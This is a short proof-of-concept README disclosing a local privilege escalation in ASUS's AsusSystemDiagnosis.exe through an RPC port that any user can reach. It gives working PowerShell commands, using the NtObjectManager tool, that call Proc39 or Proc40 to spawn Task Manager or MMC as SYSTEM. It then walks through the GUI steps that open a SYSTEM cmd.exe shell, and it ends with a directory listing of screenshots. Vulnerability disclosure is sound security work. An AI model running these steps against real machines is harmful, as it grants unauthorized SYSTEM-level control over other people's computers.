Privilege Escalation - AsusSystemDiagnosis.exe - Proc39()
Full Path: C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
Issue:
The ALPC Port \RPC Control\ASHWTestServer, exposed by AsusSystemDiagnosis.exe is fully accessible to any user. Calling Proc39() via RPC through this port spawns a taskmgr.exe process as SYSTEM in the current user's session.
Exploitation:
Utilizing Project Zero's NtObjectManager RPC tool from https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools (make sure you take the compiled release) the vulnerable RPC port can be connected to at which point Proc39() can be called. Once the SYSTEM taskmgr.exe process is spawned a cmd.exe shell can be created by utilizing the "Run New Task" functionality via the context menu, File > Run New Task > cmd.exe.
NtObjectManager:
$server = get-rpcserver C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
$client = get-rpcclient $server
$client.connect()
$client.Proc39()
Privilege Escalation - AsusSystemDiagnosis.exe - Proc40()
Same as above but spawns mmc.exe as system. Can either create a new task or use the browse functionality to open a explorer.exe window and execute cmd.exe from the address bar.
Additional Notes:
Proc53() - spawns systemreset.exe as SYSTEM
Proc54() - spawns RecoveryDrive.exe as SYSTEM
[4.0K] /data/pocs/a34298b58a8ace4eea9e6a7194b6bc5170aa0564
├── [615K] AsusSystemDiagnosis.exe
├── [4.0K] Proc39
│ ├── [ 19K] ALPC_Port_Permissions.PNG
│ ├── [ 54K] NtObjectManager_RPC_Call_2.PNG
│ ├── [ 26K] NtObjectManager_RPC_Call.PNG
│ ├── [ 34K] system_shell.PNG
│ ├── [ 97K] task_manager_1.PNG
│ └── [ 92K] task_manager_2.PNG
├── [4.0K] Proc40
│ ├── [6.0K] mmc_system.PNG
│ ├── [ 68K] proc40_rpc_call.PNG
│ ├── [135K] spawning_shell.PNG
│ └── [ 99K] system_shell.PNG
└── [1.4K] README.md
2 directories, 12 files